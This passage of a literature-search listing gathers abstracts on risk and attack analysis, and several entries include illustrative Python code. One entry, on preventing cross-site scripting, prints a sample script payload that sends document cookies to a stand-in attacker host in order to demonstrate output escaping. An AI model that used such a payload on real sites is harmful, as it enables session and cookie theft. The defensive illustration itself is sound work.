    Common cause failure analysis, also called common mode failure analysis, is an integral part of a complex system reliability analysis. This paper extends existing methods of computer aided common cause failure analysis by allowing analysis of the complex systems often encountered in practice. The methods presented here aid in identifying potential common cause failures and also address quantitative common cause failure analysis

  1. Discovering the Effects-Endstate Linkage: Using Soft Systems Methodology to Perform EBO Mission Analysis

    National Research Council Canada - National Science Library

    Young, Jr, William E

    2005-01-01

    .... EBO mission analysis is shown to be more problem structuring than problem solving. A new mission analysis process is proposed using a modified version of Soft Systems Methodology to meet these challenges...

  2. Tsunami vulnerability analysis in the coastal town of Catania, Sicily: methodology and results

    Science.gov (United States)

    Pagnoni, Gianluca; Tinti, Stefano; Gallazzi, Sara; Tonini, Roberto; Zaniboni, Filippo

    2010-05-01

    Catania lies on the eastern coast of Sicily and is one of the most important towns in Sicily as regards history, tourism and industry. Recent analyses conducted in the frame of the project TRANSFER have shown that it is exposed not only to tsunamis generated locally, but also to distant tsunamis generated in the western Hellenic arc. In the frame of the European project SCHEMA, different scenarios covering local sources such as the 11 January 1693 event and the 1908 case, as well as remote sources such as the 365 AD tsunami, have been explored through numerical modelling in order to assess the vulnerability of the area to tsunami attacks. One of the primary outcomes of the scenario analysis is the quantification of the inundation zones (location, extension along the coast and landward). Taking the modelling results on flooding as input data, the analysis has focussed on the geomorphological characteristics of the coast and on the building and infrastructure typology in order to evaluate the vulnerability level of the Catania area. The coast to the south of the harbour of Catania is low and characterized by a mild slope: the topography reaches an altitude of 10 m at 300-750 m from the shoreline. Building density is low, and tourist structures generally prevail over residential houses. The zone north of the harbour is high coast, with the 10 m isoline usually close to the coastline and little possibility for the flood to penetrate deep inland. Here there are three small marinas with the corresponding services and infrastructure around them, and the city quarters consist of residential buildings. Vulnerability assessment has been carried out by following the methodology developed by the SCHEMA consortium, distinguishing between primary (type and material) and secondary criteria (e.g. ground, age, foundation, orientation, etc.) for buildings, and by adopting a building damage matrix, basically depending on building type and water inundation depth. Data needed for such

  3. Attack Trees for Practical Security Assessment: Ranking of Attack Scenarios with ADTool 2.0

    NARCIS (Netherlands)

    Gadyatskaya, Olga; Jhawar, Ravi; Kordy, P.T.; Lounis, Karim; Mauw, Sjouke; Trujillo-Rasua, Rolando

    2016-01-01

    In this tool demonstration paper we present the ADTool2.0: an open-source software tool for design, manipulation and analysis of attack trees. The tool supports ranking of attack scenarios based on quantitative attributes entered by the user; it is scriptable; and it incorporates attack trees with

  4. Critical infrastructure systems of systems assessment methodology.

    Energy Technology Data Exchange (ETDEWEB)

    Sholander, Peter E.; Darby, John L.; Phelan, James M.; Smith, Bryan; Wyss, Gregory Dane; Walter, Andrew; Varnado, G. Bruce; Depoy, Jennifer Mae

    2006-10-01

    Assessing the risk of malevolent attacks against large-scale critical infrastructures requires modifications to existing methodologies that separately consider physical security and cyber security. This research has developed a risk assessment methodology that explicitly accounts for both physical and cyber security, while preserving the traditional security paradigm of detect, delay, and respond. This methodology also accounts for the condition that a facility may be able to recover from or mitigate the impact of a successful attack before serious consequences occur. The methodology uses evidence-based techniques (which are a generalization of probability theory) to evaluate the security posture of the cyber protection systems. Cyber threats are compared against cyber security posture using a category-based approach nested within a path-based analysis to determine the most vulnerable cyber attack path. The methodology summarizes the impact of a blended cyber/physical adversary attack in a conditional risk estimate where the consequence term is scaled by a ''willingness to pay'' avoidance approach.
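
    The shape of the conditional risk estimate described above can be illustrated with a few lines of Python. Everything below is invented for illustration (path list, probabilities, consequence values, willingness-to-pay factor); the actual methodology uses evidence-based measures of the cyber security posture rather than the plain probabilities shown here.

        # Illustrative conditional risk estimate for blended cyber/physical attack paths.
        paths = {
            # path name: (P(success | attempted), consequence in dollars)
            "cyber_only":             (0.15, 40e6),
            "physical_only":          (0.05, 60e6),
            "blended_cyber_physical": (0.25, 60e6),
        }

        p_attempt = 0.01            # assumed annual likelihood of an attempt
        willingness_to_pay = 0.6    # fraction of the consequence society would pay to avoid it

        def conditional_risk(p_success, consequence):
            return p_attempt * p_success * willingness_to_pay * consequence

        for name, (p, c) in paths.items():
            print(f"{name:24s} risk = {conditional_risk(p, c):12,.0f} $/yr")
        worst = max(paths, key=lambda k: conditional_risk(*paths[k]))
        print("most vulnerable path:", worst)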

  5. Internal fire analysis screening methodology for the Salem Nuclear Generating Station

    International Nuclear Information System (INIS)

    Eide, S.; Bertucio, R.; Quilici, M.; Bearden, R.

    1989-01-01

    This paper reports on an internal fire analysis screening methodology that has been utilized for the Salem Nuclear Generating Station (SNGS) Probabilistic Risk Assessment (PRA). The methodology was first developed and applied in the Brunswick Steam Electric Plant (BSEP) PRA. The SNGS application includes several improvements and extensions to the original methodology. The SNGS approach differs significantly from traditional fire analysis methodologies by providing a much more detailed treatment of transient combustibles. This level of detail results in a model which is more usable for assisting in the management of fire risk at the plant

  6. Development Risk Methodology for Whole Systems Trade Analysis

    Science.gov (United States)

    2016-08-01

    WSTAT). In the early stages of the V&V for development risk, it was discovered that the original risk rating and methodology did not actually... WSTA has opened trade space exploration by allowing the tool to evaluate trillions of potential system configurations to then return a handful of

  7. Risk of Stroke/Transient Ischemic Attack or Myocardial Infarction with Herpes Zoster: A Systematic Review and Meta-Analysis.

    Science.gov (United States)

    Zhang, Yanting; Luo, Ganfeng; Huang, Yuanwei; Yu, Qiuyan; Wang, Li; Li, Ke

    2017-08-01

    Accumulating evidence indicates that herpes zoster (HZ) may increase the risk of stroke/transient ischemic attack (TIA) or myocardial infarction (MI), but the results are inconsistent. We aim to explore the relationship between HZ and the risk of stroke/TIA or MI and between herpes zoster ophthalmicus (HZO) and stroke. We estimated the relative risk (RR) and 95% confidence intervals (CIs) with the meta-analysis. Cochran's Q test and Higgins' I² statistic were used to check for heterogeneity. HZ infection was significantly associated with increased risk of stroke/TIA (RR = 1.30, 95% CI: 1.17-1.46) or MI (RR = 1.18, 95% CI: 1.07-1.30). The risk of stroke after HZO was 1.91 (95% CI 1.32-2.76), higher than that after HZ. Subgroup analyses revealed increased risk of ischemic stroke after HZ infection but not hemorrhagic stroke. The risk of stroke was increased more at 1 month after HZ infection than at 1-3 months, with the risk gradually decreasing over time. The risk of stroke after HZ infection was greater for those aged less than 40 years than for those aged 40-59 years or more than 60 years. The risk of stroke with HZ infection was greater without treatment than with treatment and was greater in Asia than in Europe and America, but did not differ by sex. Our study indicated that HZ infection was associated with increased risk of stroke/TIA or MI, and HZO infection was the most marked risk factor for stroke. Further studies are needed to explore whether zoster vaccination could reduce the risk of stroke/TIA or MI. Copyright © 2017 National Stroke Association. Published by Elsevier Inc. All rights reserved.
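
    For readers unfamiliar with how pooled relative risks, Cochran's Q and I² are obtained, a minimal fixed-effect inverse-variance sketch in Python follows. The four study estimates are invented and are not the studies pooled in this meta-analysis.

        import numpy as np
        from scipy import stats

        rr    = np.array([1.25, 1.40, 1.18, 1.35])   # invented per-study relative risks
        lower = np.array([1.05, 1.10, 0.98, 1.12])   # lower 95% CI bounds
        upper = np.array([1.49, 1.78, 1.42, 1.63])   # upper 95% CI bounds

        log_rr = np.log(rr)
        se = (np.log(upper) - np.log(lower)) / (2 * 1.96)   # SE recovered from the CI
        w = 1.0 / se**2                                     # inverse-variance weights

        pooled = np.sum(w * log_rr) / np.sum(w)
        pooled_se = np.sqrt(1.0 / np.sum(w))
        ci = np.exp(pooled + np.array([-1.96, 1.96]) * pooled_se)

        q = np.sum(w * (log_rr - pooled) ** 2)              # Cochran's Q
        df = len(rr) - 1
        i2 = max(0.0, (q - df) / q) * 100                   # Higgins' I^2 in percent
        p_het = 1 - stats.chi2.cdf(q, df)

        print(f"pooled RR = {np.exp(pooled):.2f} (95% CI {ci[0]:.2f}-{ci[1]:.2f})")
        print(f"Q = {q:.2f} (p = {p_het:.3f}), I^2 = {i2:.1f}%")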

  8. Component build-up method for engineering analysis of missiles at low-to-high angles of attack

    Science.gov (United States)

    Hemsch, Michael J.

    1992-01-01

    Methods are presented for estimating the component build-up terms, with the exception of zero-lift drag, for missile airframes in steady flow and at arbitrary angles of attack and bank. The underlying and unifying bases of all these efforts are slender-body theory and its nonlinear extensions through the equivalent angle-of-attack concept. Emphasis is placed on the forces and moments which act on each of the fins, so that control cross-coupling effects as well as longitudinal and lateral-directional effects can be determined.

  9. Integrating cyber attacks within fault trees

    International Nuclear Information System (INIS)

    Nai Fovino, Igor; Masera, Marcelo; De Cian, Alessio

    2009-01-01

    In this paper, a new method for quantitative security risk assessment of complex systems is presented, combining fault-tree analysis, traditionally used in reliability analysis, with the recently introduced Attack-tree analysis, proposed for the study of malicious attack patterns. The combined use of fault trees and attack trees helps the analyst to effectively face the security challenges posed by the introduction of modern ICT technologies in the control systems of critical infrastructures. The proposed approach allows considering the interaction of malicious deliberate acts with random failures. Formal definitions of fault tree and attack tree are provided and a mathematical model for the calculation of system fault probabilities is presented.
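
    The essence of the combination can be shown with a toy tree in which the top event occurs either through a random component failure or through a two-step malicious attack. A minimal Python sketch follows; the structure and all probabilities are invented, and independence of events is assumed, which the paper's mathematical model does not require.

        # Toy combined fault/attack tree: top event = pump fails randomly OR
        # (attacker gains network access AND corrupts the controller).
        def p_or(*ps):      # P(A or B or ...) for independent events
            q = 1.0
            for p in ps:
                q *= (1.0 - p)
            return 1.0 - q

        def p_and(*ps):     # P(A and B and ...) for independent events
            q = 1.0
            for p in ps:
                q *= p
            return q

        p_pump_random_failure = 1e-3    # classical reliability datum
        p_gain_network_access = 5e-2    # attack-tree leaf
        p_corrupt_controller  = 2e-1    # attack-tree leaf

        p_cyber_branch = p_and(p_gain_network_access, p_corrupt_controller)
        p_top = p_or(p_pump_random_failure, p_cyber_branch)
        print(f"P(top event) = {p_top:.4e}")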

  10. Integrating cyber attacks within fault trees

    Energy Technology Data Exchange (ETDEWEB)

    Nai Fovino, Igor [Joint Research Centre - EC, Institute for the Protection and Security of the Citizen, Ispra, VA (Italy)], E-mail: igor.nai@jrc.it; Masera, Marcelo [Joint Research Centre - EC, Institute for the Protection and Security of the Citizen, Ispra, VA (Italy); De Cian, Alessio [Department of Electrical Engineering, University di Genova, Genoa (Italy)

    2009-09-15

    In this paper, a new method for quantitative security risk assessment of complex systems is presented, combining fault-tree analysis, traditionally used in reliability analysis, with the recently introduced Attack-tree analysis, proposed for the study of malicious attack patterns. The combined use of fault trees and attack trees helps the analyst to effectively face the security challenges posed by the introduction of modern ICT technologies in the control systems of critical infrastructures. The proposed approach allows considering the interaction of malicious deliberate acts with random failures. Formal definitions of fault tree and attack tree are provided and a mathematical model for the calculation of system fault probabilities is presented.

  11. Predicting Factors of Zone 4 Attack in Volleyball.

    Science.gov (United States)

    Costa, Gustavo C; Castro, Henrique O; Evangelista, Breno F; Malheiros, Laura M; Greco, Pablo J; Ugrinowitsch, Herbert

    2017-06-01

    This study examined 142 volleyball games of the Men's Super League 2014/2015 season in Brazil, from which we analyzed 24-26 games of each participating team, identifying 5,267 Zone 4 attacks for further analysis. Within these Zone 4 attacks, we analyzed the association between the effect of the attack carried out and the separate effects of serve reception, tempo and type of attack. We found that the reception, tempo of attack, second tempo of attack, and power of the diagonal attack were predictors of the attack effect in Zone 4. Moreover, placed attacks showed a tendency not to yield a score. In conclusion, winning points in high-level men's volleyball requires excellent receptions, a fast attack tempo and powerfully executed attacks.

  12. Terrorists and Suicide Attacks

    National Research Council Canada - National Science Library

    Cronin, Audrey K

    2003-01-01

    Suicide attacks by terrorist organizations have become more prevalent globally, and assessing the threat of suicide attacks against the United States and its interests at home and abroad has therefore...

  13. Solidarity under Attack

    DEFF Research Database (Denmark)

    Meret, Susi; Goffredo, Sergio

    2017-01-01

    https://www.opendemocracy.net/can-europe-make-it/susi-meret-sergio-goffredo/solidarity-under-attack

  14. Pericarditis - after heart attack

    Science.gov (United States)

    ... include: a previous heart attack, open heart surgery, chest trauma, or a heart attack that has affected the thickness of your heart muscle. Symptoms include: anxiety, chest pain from the swollen pericardium rubbing on the ...

  15. Heart attack first aid

    Science.gov (United States)

    First aid - heart attack; First aid - cardiopulmonary arrest; First aid - cardiac arrest ... A heart attack occurs when the blood flow that carries oxygen to the heart is blocked. The heart muscle ...

  16. Analysis of Traffic Signals on a Software-Defined Network for Detection and Classification of a Man-in-the-Middle Attack

    Science.gov (United States)

    2017-09-01

    ... management capabilities of a highly distributed military communications environment. Yet, military adoption of SDN is contingent on a thorough ... analysis of security implications. In this thesis, we investigate a man-in-the-middle (MITM) attack that exploits the centralized topological view

  17. Fully Stochastic Distributed Methodology for Multivariate Flood Frequency Analysis

    Directory of Open Access Journals (Sweden)

    Isabel Flores-Montoya

    2016-05-01

    Full Text Available An adequate estimation of the extreme behavior of basin response is essential both for designing river structures and for evaluating their risk. The aim of this paper is to develop a new methodology to generate extreme hydrograph series of thousands of years using an event-based model. To this end, a spatial-temporal synthetic rainfall generator (RainSimV3) is combined with a distributed physically-based rainfall–runoff event-based model (RIBS). The use of an event-based model allows simulating longer hydrograph series with fewer computational and data requirements, but requires characterizing the initial basin state, which depends on the initial basin moisture distribution. To overcome this problem, this paper proposes a probabilistic calibration–simulation approach, which considers the initial state and the model parameters as random variables characterized by a probability distribution through a Monte Carlo simulation. This approach is compared with two other approaches, the deterministic and the semi-deterministic approaches. Both approaches use a unique initial state. The deterministic approach also uses a unique value of the model parameters, while the semi-deterministic approach obtains these values from their probability distribution through a Monte Carlo simulation, considering the basin variability. This methodology has been applied to the Corbès and Générargues basins, in the southeast of France. The results show that the probabilistic approach offers the best fit. That means that the proposed methodology can be successfully used to characterize the extreme behavior of the basin, considering the basin variability and overcoming the basin initial state problem.
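
    The probabilistic calibration-simulation idea can be sketched in a few lines: sample the initial basin state and the model parameters for every synthetic storm, run the event-based model, and build the empirical frequency curve from the simulated peaks. In the Python sketch below the rainfall generator and the rainfall-runoff model are replaced by crude one-line surrogates (they stand in for RainSimV3 and RIBS, which are not reproduced), and all distributions are assumed.

        import numpy as np

        rng = np.random.default_rng(1)
        n_events = 10_000

        # Synthetic storm depths (mm), standing in for the rainfall generator output.
        rainfall = rng.gamma(shape=2.0, scale=30.0, size=n_events)

        # Initial soil-moisture state and a runoff parameter treated as random variables,
        # re-sampled for every event (assumed distributions).
        moisture = rng.beta(2, 5, size=n_events)                      # 0 = dry, 1 = saturated
        runoff_c = rng.normal(0.45, 0.10, size=n_events).clip(0.05, 0.95)

        # Stand-in event-based response: peak flow grows with rainfall, wetness and C.
        peak_flow = runoff_c * (0.3 + 0.7 * moisture) * rainfall      # arbitrary units

        # Empirical frequency curve: peak flow against return period.
        sorted_q = np.sort(peak_flow)[::-1]
        return_period = (n_events + 1) / np.arange(1, n_events + 1)
        for T in (10, 100, 1000):
            q_T = sorted_q[np.argmin(np.abs(return_period - T))]
            print(f"T = {T:5d} yr  ->  peak flow = {q_T:.1f}")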

  18. Development and application of a deterministic-realistic hybrid methodology for LOCA licensing analysis

    International Nuclear Information System (INIS)

    Liang, Thomas K.S.; Chou, Ling-Yao; Zhang, Zhongwei; Hsueh, Hsiang-Yu; Lee, Min

    2011-01-01

    Highlights: → A new LOCA licensing methodology (DRHM, deterministic-realistic hybrid methodology) was developed. → DRHM involves conservative Appendix K physical models and statistical treatment of plant status uncertainties. → DRHM can generate 50-100 K PCT margin as compared to a traditional Appendix K methodology. - Abstract: It is well recognized that a realistic LOCA analysis with uncertainty quantification can generate greater safety margin as compared with classical conservative LOCA analysis using Appendix K evaluation models. The associated margin can be more than 200 K. To quantify uncertainty in BELOCA analysis, there are generally two kinds of uncertainties required to be identified and quantified, which involve model uncertainties and plant status uncertainties. In particular, it takes a huge effort to systematically quantify the individual model uncertainties of a best estimate LOCA code, such as RELAP5 or TRAC. Instead of applying a full-range BELOCA methodology to cover both model and plant status uncertainties, a deterministic-realistic hybrid methodology (DRHM) was developed to support LOCA licensing analysis. In the DRHM, Appendix K deterministic evaluation models are adopted to ensure model conservatism, while the CSAU methodology is applied to quantify the effect of plant status uncertainty on the PCT calculation. Generally, the DRHM can generate about 80-100 K margin on PCT as compared to an Appendix K bounding state LOCA analysis.
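
    The statistical treatment of plant-status uncertainty in CSAU-type analyses is often implemented with non-parametric (Wilks) order statistics; whether DRHM uses exactly that recipe is not stated in the abstract, so the Python sketch below is an assumption. It samples 59 plant states, evaluates a deliberately simple surrogate in place of an Appendix K PCT calculation, and reads the 95/95 estimate off the maximum.

        import numpy as np

        rng = np.random.default_rng(7)
        n_runs = 59   # first-order one-sided Wilks sample size for a 95/95 statement

        # Sampled plant-status parameters (assumed distributions, illustrative only).
        core_power_frac = rng.normal(1.00, 0.01, n_runs)    # fraction of rated power
        accum_pressure  = rng.uniform(4.0, 4.4, n_runs)     # accumulator pressure, MPa
        gap_conductance = rng.normal(1.0, 0.05, n_runs)     # relative to nominal

        def surrogate_pct(power, pressure, gap):
            """Stand-in for an Appendix K PCT calculation (deliberately simple)."""
            return (1100.0 + 600.0 * (power - 1.0) - 40.0 * (pressure - 4.2)
                    - 80.0 * (gap - 1.0) + rng.normal(0.0, 5.0))

        pct = np.array([surrogate_pct(p, pr, g) for p, pr, g in
                        zip(core_power_frac, accum_pressure, gap_conductance)])

        # With 59 runs, the maximum bounds the 95th percentile at 95% confidence.
        print(f"95/95 PCT estimate = {pct.max():.1f} K, "
              f"margin to a 1477 K acceptance limit = {1477.0 - pct.max():.1f} K")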

  19. INTEGRATED METHODOLOGY FOR PRODUCT PLANNING USING MULTI CRITERIA ANALYSIS

    Directory of Open Access Journals (Sweden)

    Tarun Soota

    2016-09-01

    Full Text Available An integrated approach to multi-criteria decision problems is proposed using quality function deployment and the analytic network process. The objective of the work is to rationalize and improve the method of analyzing and interpreting customer needs and technical requirements. The methodology is used to determine and prioritize engineering requirements based on customer needs for the development of the best product. The framework allows the decision maker to decompose a complex problem into a hierarchical structure to show the relationship between objective and criteria. Multi-criteria decision modeling is used for extending the hierarchy process to both dependence and feedback. A case study on bikes is presented for the proposed model.
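
    The analytic-network-process half of such an approach boils down to finding the limiting priorities of a column-stochastic supermatrix built from pairwise comparisons. A minimal Python sketch follows; the 3x3 supermatrix and the element names are invented and have nothing to do with the bike case study.

        import numpy as np

        # Invented column-stochastic supermatrix linking three decision elements.
        W = np.array([
            [0.0, 0.6, 0.3],
            [0.5, 0.0, 0.7],
            [0.5, 0.4, 0.0],
        ])

        # Limiting priorities: raise the supermatrix to a high power until columns converge.
        limit = np.linalg.matrix_power(W, 50)
        priorities = limit[:, 0] / limit[:, 0].sum()
        for name, p in zip(["element A", "element B", "element C"], priorities):
            print(f"{name}: priority = {p:.3f}")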

  20. A methodological comparison of customer service analysis techniques

    Science.gov (United States)

    James Absher; Alan Graefe; Robert Burns

    2003-01-01

    Techniques used to analyze customer service data need to be studied. Two primary analysis protocols, importance-performance analysis (IP) and gap score analysis (GA), are compared in a side-by-side comparison using data from two major customer service research projects. A central concern is what, if any, conclusion might be different due solely to the analysis...

  1. Stream habitat analysis using the instream flow incremental methodology

    Science.gov (United States)

    Bovee, Ken D.; Lamb, Berton L.; Bartholow, John M.; Stalnaker, Clair B.; Taylor, Jonathan; Henriksen, Jim

    1998-01-01

    This document describes the Instream Flow Incremental Methodology (IFIM) in its entirety. It is also intended to serve as a comprehensive introductory textbook on IFIM for training courses, as it contains the most complete and comprehensive description of IFIM in existence today. It should also serve as an official published guide to IFIM, to counteract the misconceptions about the methodology that have pervaded the professional literature since the mid-1980s, as it describes IFIM as it is envisioned by its developers. The document is aimed at the decisionmakers of management and allocation of natural resources, to provide them an overview, and at those who design and implement studies to inform the decisionmakers. There should be enough background on model concepts, data requirements, calibration techniques, and quality assurance to help the technical user design and implement a cost-effective application of IFIM that will provide policy-relevant information. Some of the chapters deal with the basic organization of IFIM and the procedural sequence of applying IFIM, starting with problem identification, study planning and implementation, and problem resolution.

  2. Using HABIT to Establish the Chemicals Analysis Methodology for Maanshan Nuclear Power Plant

    OpenAIRE

    J. R. Wang; S. W. Chen; Y. Chiang; W. S. Hsu; J. H. Yang; Y. S. Tseng; C. Shih

    2017-01-01

    In this research, the HABIT analysis methodology was established for Maanshan nuclear power plant (NPP). The Final Safety Analysis Report (FSAR), reports, and other data were used in this study. To evaluate the control room habitability under the CO2 storage burst, the HABIT methodology was used to perform this analysis. The HABIT result was below the R.G. 1.78 failure criteria. This indicates that Maanshan NPP habitability can be maintained. Additionally, the sensitivity study of the paramet...

  3. Social Sentiment Sensor in Twitter for Predicting Cyber-Attacks Using ℓ₁ Regularization.

    Science.gov (United States)

    Hernandez-Suarez, Aldo; Sanchez-Perez, Gabriel; Toscano-Medina, Karina; Martinez-Hernandez, Victor; Perez-Meana, Hector; Olivares-Mercado, Jesus; Sanchez, Victor

    2018-04-29

    In recent years, online social media information has been the subject of study in several data science fields due to its impact on users as a communication and expression channel. Data gathered from online platforms such as Twitter has the potential to facilitate research over social phenomena based on sentiment analysis, which usually employs Natural Language Processing and Machine Learning techniques to interpret sentimental tendencies related to users’ opinions and make predictions about real events. Cyber-attacks are not isolated from opinion subjectivity on online social networks. Various security attacks are performed by hacker activists motivated by reactions from polemic social events. In this paper, a methodology for tracking social data that can trigger cyber-attacks is developed. Our main contribution lies in the monthly prediction of tweets with content related to security attacks and the incidents detected based on ℓ 1 regularization.
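
    A common way to realise an ℓ1-regularized text classifier of this kind is logistic regression with an L1 penalty over TF-IDF features, which drives most coefficients to zero and keeps a sparse set of predictive terms. The scikit-learn sketch below is only an illustration of that idea, with a tiny invented corpus; it is not the pipeline, features or data used by the authors.

        from sklearn.feature_extraction.text import TfidfVectorizer
        from sklearn.linear_model import LogisticRegression
        from sklearn.pipeline import make_pipeline

        # Tiny invented corpus: 1 = tweet related to a security attack, 0 = unrelated.
        tweets = [
            "ddos attack planned against bank site tonight",
            "we will leak the database of the ministry",
            "lovely weather for a picnic today",
            "new album drops friday so excited",
            "operation begins, target list published, fire the cannons",
            "great match yesterday, what a goal",
        ]
        labels = [1, 1, 0, 0, 1, 0]

        # The l1 penalty (liblinear solver) keeps only the most predictive n-grams.
        model = make_pipeline(
            TfidfVectorizer(ngram_range=(1, 2)),
            LogisticRegression(penalty="l1", solver="liblinear", C=1.0),
        )
        model.fit(tweets, labels)

        print(model.predict(["they plan to ddos the election site",
                             "cats are the best pets"]))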

  4. Social Sentiment Sensor in Twitter for Predicting Cyber-Attacks Using ℓ1 Regularization

    Directory of Open Access Journals (Sweden)

    Aldo Hernandez-Suarez

    2018-04-01

    Full Text Available In recent years, online social media information has been the subject of study in several data science fields due to its impact on users as a communication and expression channel. Data gathered from online platforms such as Twitter has the potential to facilitate research over social phenomena based on sentiment analysis, which usually employs Natural Language Processing and Machine Learning techniques to interpret sentimental tendencies related to users’ opinions and make predictions about real events. Cyber-attacks are not isolated from opinion subjectivity on online social networks. Various security attacks are performed by hacker activists motivated by reactions from polemic social events. In this paper, a methodology for tracking social data that can trigger cyber-attacks is developed. Our main contribution lies in the monthly prediction of tweets with content related to security attacks and the incidents detected based on ℓ 1 regularization.

  5. Social Sentiment Sensor in Twitter for Predicting Cyber-Attacks Using ℓ1 Regularization

    Science.gov (United States)

    Sanchez-Perez, Gabriel; Toscano-Medina, Karina; Martinez-Hernandez, Victor; Olivares-Mercado, Jesus; Sanchez, Victor

    2018-01-01

    In recent years, online social media information has been the subject of study in several data science fields due to its impact on users as a communication and expression channel. Data gathered from online platforms such as Twitter has the potential to facilitate research over social phenomena based on sentiment analysis, which usually employs Natural Language Processing and Machine Learning techniques to interpret sentimental tendencies related to users’ opinions and make predictions about real events. Cyber-attacks are not isolated from opinion subjectivity on online social networks. Various security attacks are performed by hacker activists motivated by reactions from polemic social events. In this paper, a methodology for tracking social data that can trigger cyber-attacks is developed. Our main contribution lies in the monthly prediction of tweets with content related to security attacks and the incidents detected based on ℓ1 regularization. PMID:29710833

  6. Establishing Equivalence: Methodological Progress in Group-Matching Design and Analysis

    Science.gov (United States)

    Kover, Sara T.; Atwood, Amy K.

    2013-01-01

    This methodological review draws attention to the challenges faced by intellectual and developmental disabilities researchers in the appropriate design and analysis of group comparison studies. We provide a brief overview of matching methodologies in the field, emphasizing group-matching designs used in behavioral research on cognition and…

  7. Literature research of FMEA (Failure Mode and Effects Analysis) methodology

    International Nuclear Information System (INIS)

    Hustak, S.

    1999-01-01

    The potential of the FMEA applications is demonstrated. Some approaches can be used for system analysis or immediately for PSA, in particular, for obtaining background information for fault tree analysis in the area of component modelling and, to a lesser extent, for identification of the initiating events. On the other hand, other FMEA applications, such as criticality analysis, are unusable in PSA. (author)

  8. Interaction between core analysis methodology and nuclear design: some PWR examples

    International Nuclear Information System (INIS)

    Rothleder, B.M.; Eich, W.J.

    1982-01-01

    The interaction between core analysis methodology and nuclear design is exemplified by PSEUDAX, a major improvement related to the Advanced Recycle Methodology Program (ARMP) computer code system, still undergoing development by the Electric Power Research Institute. The mechanism of this interaction is explored by relating several specific nuclear design changes to the demands placed by these changes on the ARMP system, and by examining the meeting of these demands, first within the standard ARMP methodology and then through augmentation of the standard methodology by development of PSEUDAX

  9. Model checking exact cost for attack scenarios

    DEFF Research Database (Denmark)

    Aslanyan, Zaruhi; Nielson, Flemming

    2017-01-01

    Attack trees constitute a powerful tool for modelling security threats. Many security analyses of attack trees can be seamlessly expressed as model checking of Markov Decision Processes obtained from the attack trees, thus reaping the benefits of a coherent framework and mature tool support. However, current model checking does not encompass the exact cost analysis of an attack, which is standard for attack trees. Our first contribution is the logic erPCTL with cost-related operators. The extended logic allows analysing the probability of an event satisfying given cost bounds and computing the exact cost of an event. Our second contribution is the model checking algorithm for erPCTL. Finally, we apply our framework to the analysis of attack trees.

  10. Development of design and analysis methodology for composite bolted joints

    Science.gov (United States)

    Grant, Peter; Sawicki, Adam

    1991-05-01

    This paper summarizes work performed to develop composite joint design methodology for use on rotorcraft primary structure, determine joint characteristics which affect joint bearing and bypass strength, and develop analytical methods for predicting the effects of such characteristics in structural joints. Experimental results have shown that bearing-bypass interaction allowables cannot be defined using a single continuous function due to variance of failure modes for different bearing-bypass ratios. Hole wear effects can be significant at moderate stress levels and should be considered in the development of bearing allowables. A computer program has been developed and has successfully predicted bearing-bypass interaction effects for the (0/+/-45/90) family of laminates using filled hole and unnotched test data.

  11. Análisis del ataque posicional de balonmano playa masculino y femenino mediante coordenadas polares. [Analysis of positional attack in beach handball male and female with polar coordinates].

    Directory of Open Access Journals (Sweden)

    Rafael E. Reigal

    2015-07-01

    Full Text Available This research aims to provide a novel perspective on understanding and differentiating game behaviour in the positional attack phase of men's and women's beach handball. To this end, 28 high-level matches were analysed with the Hoisan software. An observational design of a nomothetic, follow-up and multidimensional character was used, with a methodologically validated taxonomic system. The data were subjected to polar coordinate analysis in its genuine version. To carry out these analyses, seven focal behaviours were chosen, relating mainly to the players who finish the attack and the way the attack is executed. The results showed differences between the pairing behaviours in the men's and women's categories. Notably, the positional attack in the women's category is oriented towards left-side finishing zones against an open defensive system and depends more on the player who takes on the role of double goalkeeper (specialist) than in the men's category, where responsibilities are more evenly shared and the attack is directed towards the right wing against a closed defensive system. The spin throw proved to be the main offensive resource in both categories.

  12. Automated Generation of Attack Trees

    DEFF Research Database (Denmark)

    Vigo, Roberto; Nielson, Flemming; Nielson, Hanne Riis

    2014-01-01

    Attack trees are widely used to represent threat scenarios in a succinct and intuitive manner, suitable for conveying security information to non-experts. The manual construction of such objects relies on the creativity and experience of specialists, and therefore it is error-prone and impracticable for large systems. Nonetheless, the automated generation of attack trees has only been explored in connection with computer networks and leveraging rich models, whose analysis typically leads to an exponential blow-up of the state space. We propose a static analysis approach where attack trees are automatically inferred from a process algebraic specification in a syntax-directed fashion, encompassing a great many application domains and avoiding systematically incurring an exponential explosion. Moreover, we show how the standard propositional denotation of an attack tree can be used to phrase…

  13. Cross-site scripting attacks procedure and Prevention Strategies

    Directory of Open Access Journals (Sweden)

    Wang Xijun

    2016-01-01

    Full Text Available Cross-site scripting (XSS) attack and defence has long been an important issue in web security. This paper gives the definition of cross-site scripting attacks, clears up current confusion about cross-site scripting, analyzes the causes and harm of such attacks, and provides a comprehensive analysis of the complete process of an XSS attack. Then, for web applications whose cross-site scripting filtering is lax, it gives effective defence strategies against cross-site scripting attacks from two perspectives: ordinary users browsing the web and web application developers.
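
    The developer-side defence referred to above ultimately comes down to never inserting untrusted input into a page without output encoding. A minimal Python sketch using the standard library's html.escape is shown below; real applications would normally rely on their template engine's auto-escaping plus a Content-Security-Policy header, so this only illustrates the principle.

        import html

        def render_comment(user_input: str) -> str:
            """Escape untrusted input before placing it in an HTML page."""
            safe = html.escape(user_input, quote=True)   # encodes < > & " '
            return f"<p class=\"comment\">{safe}</p>"

        malicious = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
        print(render_comment(malicious))
        # The payload is rendered as inert text instead of being executed by the browser.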

  14. Composite Dos Attack Model

    Directory of Open Access Journals (Sweden)

    Simona Ramanauskaitė

    2012-04-01

    Full Text Available Preparation for potential threats is one of the most important phases ensuring system security. It allows evaluating possible losses, changes in the attack process, the effectiveness of used countermeasures, optimal system settings, etc. In cyber-attack cases, executing real experiments can be difficult for many reasons. However, mathematical or programming models can be used instead of conducting experiments in a real environment. This work proposes a composite denial of service attack model that combines bandwidth exhaustion, filtering and memory depletion models for a more realistic representation of such cyber-attacks. On the basis of the introduced model, different experiments were done. They showed the main dependencies of the influence of the attacker's and victim's properties on the success probability of a denial of service attack. In the future, this model can be used for denial of service attack or countermeasure optimization.
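
    A toy bandwidth-exhaustion component of such a composite model might look like the Python sketch below: the probability that a legitimate request is served drops once the combined offered load exceeds the victim's capacity, and filtering removes part of the attack traffic. The formula and all figures are invented for illustration and are not the model proposed in the paper.

        def service_probability(legit_rate, attack_rate, capacity, filter_eff=0.0):
            """Toy estimate of P(legitimate request served) under a flooding attack.

            legit_rate  : legitimate traffic, requests/s
            attack_rate : attack traffic reaching the victim, requests/s
            capacity    : requests/s the victim (or its uplink) can handle
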